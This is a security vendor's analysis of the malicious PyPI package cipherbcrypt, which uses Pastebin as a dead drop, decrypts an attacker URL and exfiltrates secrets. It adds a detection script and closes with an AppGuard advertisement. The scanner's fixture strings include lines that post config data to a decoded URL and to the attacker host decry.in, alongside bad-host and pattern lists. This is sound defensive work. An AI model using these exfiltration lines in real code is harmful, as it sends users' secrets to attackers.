Analysis Of Malicious Python Package cipherbcrypt


A malicious package named cipherbcrypt was found on PyPI.

Upon visiting the package's page on PyPI, we can see that it is quite a popular package.

Package Page On Pypi

After downloading and investigating the source code, we found the following:

Key Findings

  • Connection to Pastebin: The package connects to a Pastebin snippet to obtain an encrypted data blob. Using a benign, widely trusted platform as the drop point helps the package avoid detection.
  • Decryption: The encrypted blob is decrypted at runtime to reveal the malicious host URL, so the URL never appears in plain text in the package source.
  • Data Exfiltration: The package sends secrets to the malicious host URL.
Encrypted Blob

The package provides two functions for encryption and decryption.

The third function is the malicious one: it sends client secrets to a remote host.

Below is the full, detailed analysis of the obfuscated source code.

Deobfuscated Source Code with comments

We can see that the malicious package is sending secrets to the following server:

hxxps://decry.in:2096/check

Make sure to block any interactions with it.
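The three behaviours listed under Key Findings (fetch from a Pastebin snippet, decode the blob, send data to the decoded host) can be triaged statically before a package is installed. The following script is an added example, not code from the original post or from the cipherbcrypt package: it walks a package's Python source with the standard `ast` module and flags string literals pointing at dead-drop hosts, calls that look like decoding, and calls that look like outbound HTTP, and it separately matches the indicator host from this post (decry.in). The sample sources embedded below are constructed for the demonstration and are not the real package's code; the host and function name lists are assumptions chosen to illustrate the pattern.

```python
"""Static triage for the dead-drop / decode / exfiltrate pattern.

Added example (not the original post's code). Walks Python source with the
ast module and reports the combination of indicators that the analysis of
cipherbcrypt describes. A hit on the known host is a definite indicator; the
three-part pattern alone is only a reason for a closer manual look.
"""
import ast
import re
from dataclasses import dataclass, field

# Indicator of compromise taken from the post (hxxps://decry.in:2096/check).
KNOWN_BAD_HOSTS = {"decry.in"}

# Benign services commonly used as dead-drop resolvers (assumed list).
DEAD_DROP_HOSTS = {"pastebin.com"}

# Call names that suggest decoding/decryption and outbound HTTP (assumed lists).
DECODE_FUNCS = {"b64decode", "decrypt", "unhexlify", "fromhex"}
NETWORK_FUNCS = {"get", "post", "urlopen", "request"}

# Captures the host part of a URL literal, stopping before any port or path.
URL_RE = re.compile(r"https?://([^/:\s]+)")


@dataclass
class Findings:
    dead_drop_hosts: set = field(default_factory=set)
    decode_calls: set = field(default_factory=set)
    network_calls: set = field(default_factory=set)
    ioc_hosts: set = field(default_factory=set)

    def verdict(self) -> str:
        """'malicious' on a known IoC, 'suspicious' on the full pattern, else 'clean'."""
        if self.ioc_hosts:
            return "malicious"
        if self.dead_drop_hosts and self.decode_calls and self.network_calls:
            return "suspicious"
        return "clean"


def _call_name(node: ast.Call) -> str:
    """Return the bare function/attribute name of a call, e.g. 'post' for requests.post()."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return ""


def scan_source(src: str) -> Findings:
    """Collect indicators from one module's source text."""
    findings = Findings()
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for host in URL_RE.findall(node.value):
                host = host.lower()
                if host in KNOWN_BAD_HOSTS:
                    findings.ioc_hosts.add(host)
                if host in DEAD_DROP_HOSTS:
                    findings.dead_drop_hosts.add(host)
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in DECODE_FUNCS:
                findings.decode_calls.add(name)
            elif name in NETWORK_FUNCS:
                findings.network_calls.add(name)
    return findings


# Constructed fixtures (not the real package): the pattern with the host
# resolved at runtime, a module that hard-codes the known host, and a clean one.
SAMPLE_SUSPICIOUS = '''
import base64, requests
def fetch():
    blob = requests.get("https://pastebin.com/raw/EXAMPLE0").text
    url = base64.b64decode(blob).decode()
    requests.post(url, json={"cfg": open("config.json").read()})
'''

SAMPLE_IOC = '''
import requests
def check(data):
    requests.post("https://decry.in:2096/check", json=data)
'''

SAMPLE_CLEAN = '''
import json
def load(path):
    with open(path) as fh:
        return json.load(fh)
'''

if __name__ == "__main__":
    for label, src in (("suspicious", SAMPLE_SUSPICIOUS),
                       ("ioc", SAMPLE_IOC), ("clean", SAMPLE_CLEAN)):
        print(label, "->", scan_source(src).verdict())
```

Run it over every `.py` file in a downloaded sdist or wheel before installation, or wire `scan_source` into a pre-install hook. Because the real package only reveals its host after decoding the blob, the "suspicious" verdict (dead-drop fetch plus decode plus outbound call) is the one that would have caught cipherbcrypt statically; the "malicious" verdict matters once the decoded host is known and can be added to `KNOWN_BAD_HOSTS`, which is also the list to mirror in egress filtering.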

Securing Third-Party Software: Safeguarding with AppGuard

Ensuring the safety of your third-party software libraries is crucial in defending against malicious packages.

Our solution, AppGuard, was developed by our Elite R&D team (35 elite cyber security professionals, including former members of the IDF 8200 unit).

AppGuard provides robust security measures to verify and monitor these libraries, ensuring they are free from vulnerabilities and malicious code. This proactive approach helps maintain the integrity of your software environment and protects against potential threats.

For more information on AppGuard capabilities and how to stay protected, contact us here.